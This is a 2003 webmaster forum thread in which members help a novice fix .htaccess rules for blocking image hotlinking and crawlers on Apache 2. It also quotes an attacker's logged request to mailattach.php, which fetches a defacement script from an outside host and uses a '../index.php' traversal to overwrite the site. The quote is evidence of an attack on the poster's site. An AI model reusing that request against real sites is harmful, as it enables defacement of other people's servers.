


.htaccess problems on Apache 2

500 errors

     
2:04 pm on Sep 19, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi everybody.

I'm so new at this that I can't figure out Apache, nor the syntax listed here. I have been around the forum a bit to see if there already was a solution to my problem, and I guess there is, but I can't figure out how to implement it on my Apache.

I tried, but Apache complained and wouldn't start up again.

Here, basically, are my two problems.

1. Remote usage of images. I have seen in my logs that the reason for my decreasing speed is that some forums have posted a great range of my images. The result was that my 4000 Kb line was crawling. I have now shut down until I have a working solution for it.

2. Crawlers, spiders, and spam bots.

Every 5 minutes there is a spider crawling around. Especially Slurp/cat; slurp@inktomi.com and 216.88.158.142.

I have an .htaccess file in root, but when I tried to use the RewriteCond syntax that I found here, Apache belched and wouldn't start.

.htaccess: RewriteCond not allowed here
htaccess: The FancyIndexing directive is no longer supported. Use IndexOptions FancyIndexing.
RewriteRule not allowed here
RewriteEngine not allowed here.

So the only thing Apache allows me to have in my .htaccess file is:

<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

Which is very useful for shutting spiders out of the system. But what about remote image linking?

Thank you

Ciao

5:34 pm on Sept 19, 2003 (gmt 0)

Administrator

WebmasterWorld Administrator jatar_k is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:July 24, 2001
posts:15755
votes: 0


Welcome to WebmasterWorld Dr_Goodman,

How about these threads:

1.
Using .htaccess to prevent image linking [webmasterworld.com]
Prevent remote image linking? [webmasterworld.com]

2.
A Close to perfect .htaccess ban list [webmasterworld.com]
A Close to perfect .htaccess ban list - Part 2 [webmasterworld.com]

A lot of reading but the answers are all in there.

9:33 pm on Sept 19, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi, thank you for the welcome.

I must be very green, because I don't get it. I have read and re-read those postings and tried, but I still get a 500 error from Apache. Seems it doesn't like me fiddling too much.

I have this in my .htaccess file in my root:

RewriteEngine on
RewriteCond %{HTTP_REFERER} ¦^$
RewriteCond %{HTTP_REFERER} ¦^http://(www\.)?mydomain\.com [NC]
RewriteRule \.(gif!jpg!png!GIF!JPG!PNG)$ - [NC,F]
# changed ! to the correct vertical line.
<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

Apache didn't like this much, so I tried putting this above it instead:

<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

And still got a 500 error.

In one of the postings there was a reference to:

SetEnvIfNoCase
FilesMatch

which I can't find in the template httpd.conf, so I'm not sure what to do with them or what the syntax should be.
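For reference, the closest thing I could piece together from the manual looks roughly like this (completely untested, and I'm only guessing that mod_setenvif and mod_access are the modules involved, with mydomain.com standing in for my real host):

# Flag requests whose Referer is blank or comes from this site
SetEnvIf Referer "^$" local_ref=1
SetEnvIfNoCase Referer "^http://(www\.)?mydomain\.com" local_ref=1

# Only serve image files to requests carrying that flag
<FilesMatch "\.(gif|jpg|png)$">
    Order Allow,Deny
    Allow from env=local_ref
</FilesMatch>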

Please, I need the help spoon-fed.

Ciao

8:49 pm on Sept 20, 2003 (gmt 0)

Full Member

10+ Year Member

joined:Aug 20, 2003
posts:255
votes: 0


I've got three questions:

1. You said that you got a 500 error. Your error log should give you more details as to why there is an error. What does it say?

2. Do you have mod_rewrite enabled in httpd.conf?

3. If most of the spiders taking up your bandwidth are ones that comply with commands in robots.txt, why not try doing it there first? That way, you can be selective about which files they can and can't spider (something along the lines of the sketch below).
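For example, a robots.txt along these lines would ask compliant crawlers to stay out of the image directory (assuming your images live under /images/, and noting that Crawl-delay is a non-standard extension that only some crawlers, such as Slurp, honour):

# Ask Inktomi's Slurp to leave images alone and slow down between requests
User-agent: Slurp
Crawl-delay: 60
Disallow: /images/

# All other compliant crawlers: index pages, but not the raw images
User-agent: *
Disallow: /images/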

BTW, you can find a Directive Quick Reference for Apache 2.0 at:
[httpd.apache.org ]
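Also, the ".htaccess: RewriteCond not allowed here" messages quoted in the first post usually mean the directives themselves are fine, but the server is not letting .htaccess use them. If you have access to httpd.conf, the things to check look roughly like this (module path and directory are guesses for a stock Apache 2.0 install):

# mod_rewrite has to be loaded (or compiled in) for the Rewrite* directives to exist
LoadModule rewrite_module modules/mod_rewrite.so

<Directory "/var/www/html">
    # Let .htaccess use Rewrite* (FileInfo class) and
    # Order/Deny/Allow, <Limit>, <Files> (Limit class)
    AllowOverride FileInfo Limit
    # mod_rewrite in a per-directory context also needs FollowSymLinks
    Options +FollowSymLinks
</Directory>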

9:10 pm on Sept 20, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi

I have read the error log, and I have a big robots.txt. Some of them comply with it, but they still try every 5 minutes. Slurp and Zyborg are the worst, plus some from spammers.

But in the meantime, I found out that I've been defaced. All that staring at the logs brought this to my attention:

(I've closed the doors now.)

[Sat Sep 20 15:04:25 2003] [error] [client IP number] File does not exist: /var/www/html/images/banners, referer: [mydomain.com...]
[Sat Sep 20 15:05:24 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php
[Sat Sep 20 15:05:26 2003] [error] [client IP number] client denied by server configuration: /var/www/html/logo.png, referer: [mydomain.com...]
[Sat Sep 20 15:08:32 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php
[Sat Sep 20 15:08:36 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php

195.92.168.168 - - [20/Sep/2003:15:05:24 +0200] "GET /mailattach.php?submit=1&attach1=http://negative0.no-ip.com/domz/defacement/index.php&attach1_name=../index.php HTTP/1.1" 404 1655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
195.92.168.168 - - [20/Sep/2003:15:05:26 +0200] "GET /logo.png HTTP/1.1" 403 1606

I used to run MyPHPnuke 1.8.8_7, but now I've closed shop.

Maybe I'll take up this thread at a later time.

Ciao

11:01 pm on Sept 20, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Mar 31, 2002
posts:25430
votes: 0


Dr_Goodman,

Welcome to WebmasterWorld [webmasterworld.com]!

I see several problems here, one of which would make Apache sick:

First, the character preceding ^ in the second and third lines should be an exclamation point, not a pipe character.

Second, the all-capitals GIF|JPG|PNG in the RewriteRule are redundant; the [NC] flag at the end makes the pattern match case-insensitive, so there is no need to specify the all-caps versions.

A nit-pick, but <LIMIT GET> should be <Limit GET>. Also, this means that the Deny from 69.44.33.104 will only be effective against GET requests. It will not stop that IP from doing a POST, DELETE, or any of the other methods. You might consider wrapping the deny in a <Files *> section instead, so it will affect all files and all methods.

Here is a corrected version (note that this forum can display the pipe characters in the RewriteRule pattern as broken vertical bars; use solid pipes in your actual file):


RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?mydomain\.com [NC]
RewriteRule \.(gif|jpg|png)$ - [NC,F]
<Files *>
Order Deny,Allow
Deny from 69.44.33.104
</Files>

Also, add:

RewriteRule ^\.ht - [F]

below RewriteEngine on. This denies HTTP user access to your .htaccess and .htpasswd files.

Jim

[edited by: jdMorgan at 11:42 pm (utc) on Sep. 20, 2003]

11:04 pm on Sept 20, 2003 (gmt 0)

Administrator

WebmasterWorld Administrator jatar_k is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:July 24, 2001
posts:15755
votes: 0


I must be very green

I wouldn't look at it that way. I answered your questions with links to other threads because this is not easy stuff and isn't really in my realm of expertise. I was also hoping that would keep the thread on the radar so jdMorgan would show up. ;)

11:46 pm on Sept 20, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi jatar_k, closed and jdMorgan

Thank you

Apache didn't complain so much now. Great stuff.

Just one more question:

This rule
RewriteCond %{HTTP_REFERER} !^http://(www\.)?mydomain\.com [NC]

applies just to my main web. But what is the correct syntax for virtual webs?

Is it:

RewriteCond %{HTTP_REFERER} !^http://(virtual\.)?mydomain\.com [NC]

Thanks to all again.

(I have to mention that I was a bit down when I wrote my last post, after discovering that my website had been hacked.)

2:12 am on Sept 21, 2003 (gmt 0)

Full Member

10+ Year Member

joined:Aug 20, 2003
posts:255
votes: 0


Do you mean subdomains? If so, one way to do it would be this:

RewriteCond %{HTTP_REFERER} !^http://([a-z]+\.)*mydomain\.com/ [NC]

I added a forward slash after .com so that a referrer like, say, mydomain.computerdomain.com wouldn't be allowed to link to your images.

The ([a-z]+\.)* allows addresses like www.mydomain.com to be valid, as well as virtual.mydomain.com and www.virtual.mydomain.com. You could make it even more flexible than that, like allowing numbers and non-alphanumeric characters, but if I did that, I would be taking away from your fun with regular expressions. You can learn more about regexes here [etext.lib.virginia.edu].
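Putting the pieces of this thread together, the whole .htaccess might end up looking roughly like this (just a sketch, using mydomain.com, the image extensions, and the single banned IP from the earlier posts):

RewriteEngine on

# Deny HTTP access to .htaccess / .htpasswd themselves
RewriteRule ^\.ht - [F]

# Allow blank referers and anything from *.mydomain.com; block other sites' image requests
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([a-z]+\.)*mydomain\.com/ [NC]
RewriteRule \.(gif|jpg|png)$ - [NC,F]

# Shut this IP out for all files and all request methods
<Files *>
  Order Deny,Allow
  Deny from 69.44.33.104
</Files>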

 
